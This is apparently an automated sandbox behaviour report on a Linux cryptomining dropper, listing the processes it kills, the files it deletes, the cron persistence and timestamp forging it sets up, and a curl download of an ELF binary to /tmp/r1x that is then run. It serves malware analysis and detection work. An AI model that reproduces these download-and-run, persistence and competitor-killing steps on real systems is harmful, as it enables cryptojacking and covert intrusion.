Source: /usr/bin/pkla-check-authorization (PID: 12910)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12924)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12938)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12952)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12959)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12980)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12994)Directory: /.cache
Enumerates processes within the "proc" file systemShow sources
Source: /bin/pkill (PID: 10090)File opened: /proc/10090/status
Source: /bin/pkill (PID: 10090)File opened: /proc/10090/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7320/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7320/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/9981/status
Source: /bin/pkill (PID: 10090)File opened: /proc/9981/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/10092/status
Source: /bin/pkill (PID: 10090)File opened: /proc/10092/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7202/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7202/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/9986/status
Source: /bin/pkill (PID: 10090)File opened: /proc/9986/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7443/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7443/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/351/status
Source: /bin/pkill (PID: 10090)File opened: /proc/351/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/352/status
Source: /bin/pkill (PID: 10090)File opened: /proc/352/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/474/status
Source: /bin/pkill (PID: 10090)File opened: /proc/474/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7437/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7437/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7438/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7438/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7559/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7559/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/6902/status
Source: /bin/pkill (PID: 10090)File opened: /proc/6902/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/10/status
Source: /bin/pkill (PID: 10090)File opened: /proc/10/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/11/status
Source: /bin/pkill (PID: 10090)File opened: /proc/11/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7571/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7571/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/13/status
Source: /bin/pkill (PID: 10090)File opened: /proc/13/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/14/status
Source: /bin/pkill (PID: 10090)File opened: /proc/14/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/15/status
Source: /bin/pkill (PID: 10090)File opened: /proc/15/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7334/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7334/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/16/status
Source: /bin/pkill (PID: 10090)File opened: /proc/16/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/17/status
Source: /bin/pkill (PID: 10090)File opened: /proc/17/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/9995/status
Source: /bin/pkill (PID: 10090)File opened: /proc/9995/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/6246/status
Source: /bin/pkill (PID: 10090)File opened: /proc/6246/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/18/status
Source: /bin/pkill (PID: 10090)File opened: /proc/18/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/19/status
Source: /bin/pkill (PID: 10090)File opened: /proc/19/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/362/status
Source: /bin/pkill (PID: 10090)File opened: /proc/362/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/363/status
Source: /bin/pkill (PID: 10090)File opened: /proc/363/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/1/status
Source: /bin/pkill (PID: 10090)File opened: /proc/1/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/2/status
Source: /bin/pkill (PID: 10090)File opened: /proc/2/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/3/status
Source: /bin/pkill (PID: 10090)File opened: /proc/3/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/5/status
Source: /bin/pkill (PID: 10090)File opened: /proc/5/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/8/status
Source: /bin/pkill (PID: 10090)File opened: /proc/8/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7448/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7448/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/9/status
Source: /bin/pkill (PID: 10090)File opened: /proc/9/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7568/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7568/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7329/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7329/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/20/status
Source: /bin/pkill (PID: 10090)File opened: /proc/20/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/21/status
Source: /bin/pkill (PID: 10090)File opened: /proc/21/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7582/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7582/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7345/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7345/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/27/status
Source: /bin/pkill (PID: 10090)File opened: /proc/27/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/10072/status
Source: /bin/pkill (PID: 10090)File opened: /proc/10072/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/28/status
Source: /bin/pkill (PID: 10090)File opened: /proc/28/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/7589/status
Source: /bin/pkill (PID: 10090)File opened: /proc/7589/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/29/status
Source: /bin/pkill (PID: 10090)File opened: /proc/29/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/1361/status
Source: /bin/pkill (PID: 10090)File opened: /proc/1361/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/490/status
Source: /bin/pkill (PID: 10090)File opened: /proc/490/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/375/status
Source: /bin/pkill (PID: 10090)File opened: /proc/375/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/376/status
Source: /bin/pkill (PID: 10090)File opened: /proc/376/cmdline
Source: /bin/pkill (PID: 10090)File opened: /proc/377/status
Source: /bin/pkill (PID: 10090)File opened: /proc/377/cmdline
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 10405)Chmod executable: /bin/chmod -> chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: /bin/bash (PID: 12103)Chmod executable: /bin/chmod -> chmod 755 /usr/local/bin/dns
Source: /bin/bash (PID: 12391)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/oanacroner
Source: /bin/bash (PID: 12530)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.daily/oanacroner
Source: /bin/bash (PID: 12694)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.monthly/oanacroner
Source: /bin/bash (PID: 13008)Chmod executable: /bin/chmod -> chmod +x /tmp/r1x
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 10418)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10419)Grep executable: /bin/grep -> grep -v \\_
Source: /bin/bash (PID: 10420)Grep executable: /bin/grep -> grep -v kthreadd
Source: /bin/bash (PID: 10421)Grep executable: /bin/grep -> grep \\[.*\\]
Source: /bin/bash (PID: 10465)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10466)Grep executable: /bin/grep -> grep xmrig
Source: /bin/bash (PID: 10499)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10500)Grep executable: /bin/grep -> grep xmrigDaemon
Source: /bin/bash (PID: 10542)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10543)Grep executable: /bin/grep -> grep xmrigMiner
Source: /bin/bash (PID: 10578)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10579)Grep executable: /bin/grep -> grep xig
Source: /bin/bash (PID: 10615)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10616)Grep executable: /bin/grep -> grep ddgs
Source: /bin/bash (PID: 10650)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10651)Grep executable: /bin/grep -> grep qW3xT
Source: /bin/bash (PID: 10676)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10677)Grep executable: /bin/grep -> grep t00ls.ru
Source: /bin/bash (PID: 10713)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10714)Grep executable: /bin/grep -> grep /var/tmp/sustes
Source: /bin/bash (PID: 10743)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10744)Grep executable: /bin/grep -> grep sustes
Source: /bin/bash (PID: 10774)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10775)Grep executable: /bin/grep -> grep Xbash
Source: /bin/bash (PID: 10809)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10810)Grep executable: /bin/grep -> grep hashfish
Source: /bin/bash (PID: 10840)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10841)Grep executable: /bin/grep -> grep cranbery
Source: /bin/bash (PID: 10871)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10872)Grep executable: /bin/grep -> grep stratum
Source: /bin/bash (PID: 10907)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10908)Grep executable: /bin/grep -> grep xmr
Source: /bin/bash (PID: 10945)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10946)Grep executable: /bin/grep -> grep minerd
Source: /bin/bash (PID: 10981)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 10982)Grep executable: /bin/grep -> grep /tmp/thisxxs
Source: /bin/bash (PID: 11017)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11018)Grep executable: /bin/grep -> grep /opt/yilu/work/xig/xig
Source: /bin/bash (PID: 11047)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11048)Grep executable: /bin/grep -> grep /opt/yilu/mservice
Source: /bin/bash (PID: 11080)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11081)Grep executable: /bin/grep -> grep /usr/bin/.sshd
Source: /bin/bash (PID: 11120)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 11146)Grep executable: /bin/grep -> grep 69.28.55.86:443
Source: /bin/bash (PID: 11199)Grep executable: /bin/grep -> grep 185.71.65.238
Source: /bin/bash (PID: 11255)Grep executable: /bin/grep -> grep 140.82.52.87
Source: /bin/bash (PID: 11303)Grep executable: /bin/grep -> grep :3333
Source: /bin/bash (PID: 11340)Grep executable: /bin/grep -> grep :4444
Source: /bin/bash (PID: 11388)Grep executable: /bin/grep -> grep :5555
Source: /bin/bash (PID: 11438)Grep executable: /bin/grep -> grep :6666
Source: /bin/bash (PID: 11503)Grep executable: /bin/grep -> grep :7777
Source: /bin/bash (PID: 11560)Grep executable: /bin/grep -> grep :3347
Source: /bin/bash (PID: 11619)Grep executable: /bin/grep -> grep :14444
Source: /bin/bash (PID: 11678)Grep executable: /bin/grep -> grep :14433
Source: /bin/bash (PID: 11732)Grep executable: /bin/grep -> grep :56415
Source: /bin/bash (PID: 12712)Grep executable: /bin/grep -> grep r1x
Source: /bin/bash (PID: 12713)Grep executable: /bin/grep -> grep -v grep
Executes the "kill" command typically used to terminate processesShow sources
Source: /bin/xargs (PID: 10454)Kill executable: /bin/kill -> kill -9 689 9917 9926 9935 9941 9948 9956 9960 9967 9975 9981 9986 9995 10001 10006 10013 10019 10025 10033 10040 10045 10053 10058 10065 10072 10078 10086 10092 10097 10106 10111 10118 10124 10130 10138 10148 10154 10162 10169 10180 10184 10188 10197 10206 10211 10215 10225 10231 10239 10244 10249 10259 10264 10272 10277 10285 10294 10299 10307 10315 10321 10326 10333 10341 10348 10356 10362 10370 10376 10385 10390
Source: /bin/xargs (PID: 10491)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10533)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10564)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10592)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10642)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10668)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10704)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10735)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10753)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10795)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10826)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10865)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10899)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10936)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 10973)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11009)Kill executable: /bin/kill -> kill
Source: /bin/xargs (PID: 11027)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11057)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11094)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11131)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11191)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11246)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11295)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11331)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11350)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11429)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11490)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11552)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11611)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11668)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11723)Kill executable: /bin/kill -> kill -9
Source: /bin/xargs (PID: 11773)Kill executable: /bin/kill -> kill -9
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 10387)Mkdir executable: /bin/mkdir -> mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
Source: /bin/bash (PID: 12162)Mkdir executable: /bin/mkdir -> mkdir -p /var/spool/cron/crontabs
Source: /bin/bash (PID: 12184)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.hourly
Source: /bin/bash (PID: 12394)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.daily
Source: /bin/bash (PID: 12532)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.monthly
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/bash (PID: 13009)Nohup executable: /bin/nohup -> nohup /tmp/r1x
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/bash (PID: 10417)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10464)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10498)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10541)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10577)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10614)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10649)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10675)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10712)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10742)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10773)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10808)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10839)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10870)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10906)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10944)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 10980)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11016)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11046)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11079)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11119)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 12711)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 12721)Ps executable: /bin/ps -> ps axf -o "pid %cpu"
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 9366)Rm executable: /bin/rm -> rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
Source: /bin/bash (PID: 9370)Rm executable: /bin/rm -> rm -rf /boot/grub/deamon
Source: /bin/bash (PID: 9379)Rm executable: /bin/rm -> rm -rf /boot/grub/disk_genius
Source: /bin/bash (PID: 9385)Rm executable: /bin/rm -> rm -rf /tmp/*index_bak*
Source: /bin/bash (PID: 9391)Rm executable: /bin/rm -> rm -rf /tmp/*httpd.conf*
Source: /bin/bash (PID: 9397)Rm executable: /bin/rm -> rm -rf /tmp/*httpd.conf
Source: /bin/bash (PID: 9404)Rm executable: /bin/rm -> rm -rf /tmp/a7b104c270
Source: /bin/bash (PID: 10234)Rm executable: /bin/rm -> rm -rf /var/tmp/j*
Source: /bin/bash (PID: 10241)Rm executable: /bin/rm -> rm -rf /tmp/j*
Source: /bin/bash (PID: 10248)Rm executable: /bin/rm -> rm -rf /var/tmp/java
Source: /bin/bash (PID: 10255)Rm executable: /bin/rm -> rm -rf /tmp/java
Source: /bin/bash (PID: 10262)Rm executable: /bin/rm -> rm -rf /var/tmp/java2
Source: /bin/bash (PID: 10269)Rm executable: /bin/rm -> rm -rf /tmp/java2
Source: /bin/bash (PID: 10276)Rm executable: /bin/rm -> rm -rf /var/tmp/java*
Source: /bin/bash (PID: 10283)Rm executable: /bin/rm -> rm -rf /tmp/java*
Source: /bin/bash (PID: 10290)Rm executable: /bin/rm -> rm -rf /tmp/httpd.conf
Source: /bin/bash (PID: 10297)Rm executable: /bin/rm -> rm -rf /tmp/conn
Source: /bin/bash (PID: 10304)Rm executable: /bin/rm -> rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
Source: /bin/bash (PID: 10311)Rm executable: /bin/rm -> rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
Source: /bin/bash (PID: 10329)Rm executable: /bin/rm -> rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-* .systemd-private-*
Source: /bin/bash (PID: 10360)Rm executable: /bin/rm -> rm -rf /etc/rc*.d/S01nfstruncate /etc/rc.d/rc*.d/S01nfstruncate
Source: /bin/bash (PID: 10380)Rm executable: /bin/rm -> rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: /bin/bash (PID: 12695)Rm executable: /bin/rm -> rm -rf /etc/ld.so.preload
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/bash (PID: 10395)Touch executable: /bin/touch -> touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: /bin/bash (PID: 12106)Touch executable: /bin/touch -> touch -acmr /bin/sh /usr/local/bin/dns
Source: /bin/bash (PID: 12111)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 12117)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 12133)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 12148)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 12169)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 12697)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.hourly/oanacroner
Source: /bin/bash (PID: 12699)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.daily/oanacroner
Source: /bin/bash (PID: 12702)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.monthly/oanacroner
Reads system information from the proc file systemShow sources
Source: /bin/bash (PID: 9334)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10417)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10417)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10464)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10464)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10498)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10498)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10541)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10541)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10577)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10577)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10614)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10614)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10649)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10649)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10675)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10675)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10712)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10712)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10742)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10742)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10773)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10773)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10808)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10808)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10839)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10839)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10870)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10870)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10906)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10906)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10944)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10944)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10980)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10980)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11016)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11016)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11046)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11046)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11079)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11079)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11119)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11119)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 12711)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 12711)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 12721)Reads from proc file: /proc/meminfo
Sample tries to set the executable flagShow sources
Source: /bin/chmod (PID: 12103)File: /usr/local/bin/dns (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12391)File: /etc/cron.hourly/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12530)File: /etc/cron.daily/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12694)File: /etc/cron.monthly/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 13008)File: /tmp/r1x (bits: - usr: rx grp: rx all: rwx)
Writes ELF files to diskShow sources
Source: /bin/curl (PID: 12765)File written: /tmp/r1xJump to dropped file
Writes crontab like entries to files to /var or /etc typically for achieving persistenceShow sources
Source: /bin/bash (PID: 9334)Crontab like entry written: /etc/crontabJump to dropped file
Samples exit code indicates no error despite standard error outputShow sources
Source: submitted sampleStderr: chattr: No such file or directory while trying to stat /tmp/kworkerdschattr: No such file or directory while trying to stat /var/tmp/kworkerdschattr: No such file or directory while trying to stat /var/tmp/config.jsonchattr: No such file or directory while trying to stat /tmp/.systemd-private-*chattr: No such file or directory while trying to stat /usr/lib/libiacpkmn.so.3chattr: No such file or directory while trying to stat /etc/init.d/nfstruncatechattr: No such file or directory while trying to stat /bin/nfstruncatechattr: No such file or directory while trying to stat /bin/ddus-uidgenchattr: No such file or directory while trying to stat /etc/init.d/acpidtdchattr: No such file or directory while trying to stat /etc/rc.d/rc*.d/S01acpidtdchattr: No such file or directory while trying to stat /etc/rc*.d/S01acpidtdchattr: No such file or directory while trying to stat /etc/ld.sc.confUsage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] 